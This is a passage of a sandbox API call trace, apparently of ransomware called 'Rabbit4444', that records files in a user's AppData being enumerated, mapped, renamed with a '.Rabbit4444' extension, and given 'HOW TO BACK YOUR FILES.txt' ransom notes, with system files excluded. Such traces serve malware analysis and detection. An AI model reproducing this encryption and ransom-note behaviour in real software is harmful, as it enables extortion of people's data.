(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\session.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\fpc.swf\\session.sol"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.823] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.823] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14513383821) returned 1 [0053.823] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=76) returned 1 [0053.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0053.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0053.823] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x298 [0053.825] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x70000 [0053.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0053.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0053.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0053.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0053.826] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14513653980) returned 1 [0053.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0053.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0053.826] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.826] CloseHandle (hObject=0x298) returned 1 [0053.826] CloseHandle (hObject=0x278) returned 1 [0053.826] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\session.sol.Rabbit4444") returned 145 [0053.826] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\session.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\fpc.swf\\session.sol"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\session.sol.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\fpc.swf\\session.sol.rabbit4444"), dwFlags=0x1) returned 1 [0053.827] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c75633, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c75633, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c85414, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="session.sol", cAlternateFileName="")) returned 0 [0053.827] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0053.827] lstrcpyW (in: lpString1=0x130ec2e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.827] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\fpc.swf\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.829] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.829] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.829] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.829] CloseHandle (hObject=0x278) returned 1 [0053.829] CloseHandle (hObject=0x27c) returned 1 [0053.829] GetCurrentThreadId () returned 0xd98 [0053.829] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0053.829] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" [0053.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10cd98 | out: hHeap=0xe0000) returned 1 [0053.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0053.829] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" [0053.829] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\" [0053.829] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\.BFC0E91B00AE8A0620D3" [0053.830] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.832] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.835] FlushFileBuffers (hFile=0x27c) returned 1 [0053.835] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.836] CloseHandle (hObject=0x27c) returned 1 [0053.836] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe") returned 37 [0053.836] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.836] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe9695420, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0053.836] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.836] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.836] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.836] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.836] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe9695420, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.836] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.836] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.836] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.837] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.837] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.837] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9695420, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9695420, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9695420, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.837] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.837] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.837] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x715a3e1e, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0053.837] lstrcmpiW (lpString1="Acrobat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.837] lstrcmpiW (lpString1="Acrobat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.837] lstrcmpiW (lpString1="Acrobat", lpString2="Rabbit4444.exe") returned -1 [0053.837] lstrcmpiW (lpString1="Acrobat", lpString2=".") returned 1 [0053.837] lstrcmpiW (lpString1="Acrobat", lpString2="..") returned 1 [0053.837] lstrcmpiW (lpString1="Acrobat", lpString2="windows") returned -1 [0053.837] lstrcmpiW (lpString1="Acrobat", lpString2="bootmgr") returned -1 [0053.837] lstrcmpiW (lpString1="Acrobat", lpString2="pagefile.sys") returned -1 [0053.837] lstrcmpiW (lpString1="Acrobat", lpString2="boot") returned -1 [0053.837] lstrcmpiW (lpString1="Acrobat", lpString2="ids.txt") returned -1 [0053.837] lstrcmpiW (lpString1="Acrobat", lpString2="NTUSER.DAT") returned -1 [0053.837] lstrcpyW (in: lpString1=0x130eb84, lpString2="Acrobat" | out: lpString1="Acrobat") returned="Acrobat" [0053.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0053.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x5c) returned 0x11c5e0 [0053.837] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6570 [0053.837] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5380e4e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5380e4e, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0053.837] lstrcmpiW (lpString1="Flash Player", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.837] lstrcmpiW (lpString1="Flash Player", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.837] lstrcmpiW (lpString1="Flash Player", lpString2="Rabbit4444.exe") returned -1 [0053.837] lstrcmpiW (lpString1="Flash Player", lpString2=".") returned 1 [0053.837] lstrcmpiW (lpString1="Flash Player", lpString2="..") returned 1 [0053.837] lstrcmpiW (lpString1="Flash Player", lpString2="windows") returned -1 [0053.837] lstrcmpiW (lpString1="Flash Player", lpString2="bootmgr") returned 1 [0053.837] lstrcmpiW (lpString1="Flash Player", lpString2="pagefile.sys") returned -1 [0053.837] lstrcmpiW (lpString1="Flash Player", lpString2="boot") returned 1 [0053.837] lstrcmpiW (lpString1="Flash Player", lpString2="ids.txt") returned -1 [0053.837] lstrcmpiW (lpString1="Flash Player", lpString2="NTUSER.DAT") returned -1 [0053.837] lstrcpyW (in: lpString1=0x130eb84, lpString2="Flash Player" | out: lpString1="Flash Player") returned="Flash Player" [0053.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0053.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x66) returned 0x120878 [0053.838] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6350 [0053.838] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7161656c, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Headlights", cAlternateFileName="HEADLI~1")) returned 1 [0053.838] lstrcmpiW (lpString1="Headlights", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.838] lstrcmpiW (lpString1="Headlights", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.838] lstrcmpiW (lpString1="Headlights", lpString2="Rabbit4444.exe") returned -1 [0053.838] lstrcmpiW (lpString1="Headlights", lpString2=".") returned 1 [0053.838] lstrcmpiW (lpString1="Headlights", lpString2="..") returned 1 [0053.838] lstrcmpiW (lpString1="Headlights", lpString2="windows") returned -1 [0053.838] lstrcmpiW (lpString1="Headlights", lpString2="bootmgr") returned 1 [0053.838] lstrcmpiW (lpString1="Headlights", lpString2="pagefile.sys") returned -1 [0053.838] lstrcmpiW (lpString1="Headlights", lpString2="boot") returned 1 [0053.838] lstrcmpiW (lpString1="Headlights", lpString2="ids.txt") returned -1 [0053.838] lstrcmpiW (lpString1="Headlights", lpString2="NTUSER.DAT") returned -1 [0053.838] lstrcpyW (in: lpString1=0x130eb84, lpString2="Headlights" | out: lpString1="Headlights") returned="Headlights" [0053.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0053.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x62) returned 0x120728 [0053.838] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf6670 [0053.838] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715ca081, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x715ca081, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0053.838] lstrcmpiW (lpString1="Linguistics", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.838] lstrcmpiW (lpString1="Linguistics", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.838] lstrcmpiW (lpString1="Linguistics", lpString2="Rabbit4444.exe") returned -1 [0053.838] lstrcmpiW (lpString1="Linguistics", lpString2=".") returned 1 [0053.838] lstrcmpiW (lpString1="Linguistics", lpString2="..") returned 1 [0053.838] lstrcmpiW (lpString1="Linguistics", lpString2="windows") returned -1 [0053.838] lstrcmpiW (lpString1="Linguistics", lpString2="bootmgr") returned 1 [0053.838] lstrcmpiW (lpString1="Linguistics", lpString2="pagefile.sys") returned -1 [0053.838] lstrcmpiW (lpString1="Linguistics", lpString2="boot") returned 1 [0053.838] lstrcmpiW (lpString1="Linguistics", lpString2="ids.txt") returned 1 [0053.838] lstrcmpiW (lpString1="Linguistics", lpString2="NTUSER.DAT") returned -1 [0053.838] lstrcpyW (in: lpString1=0x130eb84, lpString2="Linguistics" | out: lpString1="Linguistics") returned="Linguistics" [0053.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0053.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x64) returned 0x120798 [0053.838] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6370 [0053.839] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7894b39b, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7894b39b, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LogTransport2", cAlternateFileName="LOGTRA~1")) returned 1 [0053.839] lstrcmpiW (lpString1="LogTransport2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.839] lstrcmpiW (lpString1="LogTransport2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.839] lstrcmpiW (lpString1="LogTransport2", lpString2="Rabbit4444.exe") returned -1 [0053.839] lstrcmpiW (lpString1="LogTransport2", lpString2=".") returned 1 [0053.839] lstrcmpiW (lpString1="LogTransport2", lpString2="..") returned 1 [0053.839] lstrcmpiW (lpString1="LogTransport2", lpString2="windows") returned -1 [0053.839] lstrcmpiW (lpString1="LogTransport2", lpString2="bootmgr") returned 1 [0053.839] lstrcmpiW (lpString1="LogTransport2", lpString2="pagefile.sys") returned -1 [0053.839] lstrcmpiW (lpString1="LogTransport2", lpString2="boot") returned 1 [0053.839] lstrcmpiW (lpString1="LogTransport2", lpString2="ids.txt") returned 1 [0053.839] lstrcmpiW (lpString1="LogTransport2", lpString2="NTUSER.DAT") returned -1 [0053.839] lstrcpyW (in: lpString1=0x130eb84, lpString2="LogTransport2" | out: lpString1="LogTransport2") returned="LogTransport2" [0053.839] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0053.839] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x68) returned 0x120958 [0053.839] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6390 [0053.839] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sonar", cAlternateFileName="")) returned 1 [0053.839] lstrcmpiW (lpString1="Sonar", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.839] lstrcmpiW (lpString1="Sonar", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.839] lstrcmpiW (lpString1="Sonar", lpString2="Rabbit4444.exe") returned 1 [0053.839] lstrcmpiW (lpString1="Sonar", lpString2=".") returned 1 [0053.839] lstrcmpiW (lpString1="Sonar", lpString2="..") returned 1 [0053.839] lstrcmpiW (lpString1="Sonar", lpString2="windows") returned -1 [0053.839] lstrcmpiW (lpString1="Sonar", lpString2="bootmgr") returned 1 [0053.839] lstrcmpiW (lpString1="Sonar", lpString2="pagefile.sys") returned 1 [0053.839] lstrcmpiW (lpString1="Sonar", lpString2="boot") returned 1 [0053.839] lstrcmpiW (lpString1="Sonar", lpString2="ids.txt") returned 1 [0053.839] lstrcmpiW (lpString1="Sonar", lpString2="NTUSER.DAT") returned 1 [0053.839] lstrcpyW (in: lpString1=0x130eb84, lpString2="Sonar" | out: lpString1="Sonar") returned="Sonar" [0053.839] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0053.839] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x58) returned 0x1155c8 [0053.839] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63f0 | out: ListHead=0xf68b0, ListEntry=0xf63f0) returned 0xf63b0 [0053.839] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sonar", cAlternateFileName="")) returned 0 [0053.839] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0053.840] lstrcpyW (in: lpString1=0x130eb84, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.840] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.840] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.840] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.841] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.841] CloseHandle (hObject=0x278) returned 1 [0053.841] CloseHandle (hObject=0x27c) returned 1 [0053.841] GetCurrentThreadId () returned 0xd98 [0053.841] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63f0 [0053.841] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar" [0053.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1155c8 | out: hHeap=0xe0000) returned 1 [0053.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63e8 | out: hHeap=0xe0000) returned 1 [0053.841] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar" [0053.841] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\" [0053.841] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\.BFC0E91B00AE8A0620D3" [0053.841] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.842] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.845] FlushFileBuffers (hFile=0x27c) returned 1 [0053.846] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.846] CloseHandle (hObject=0x27c) returned 1 [0053.846] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar") returned 43 [0053.846] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.847] 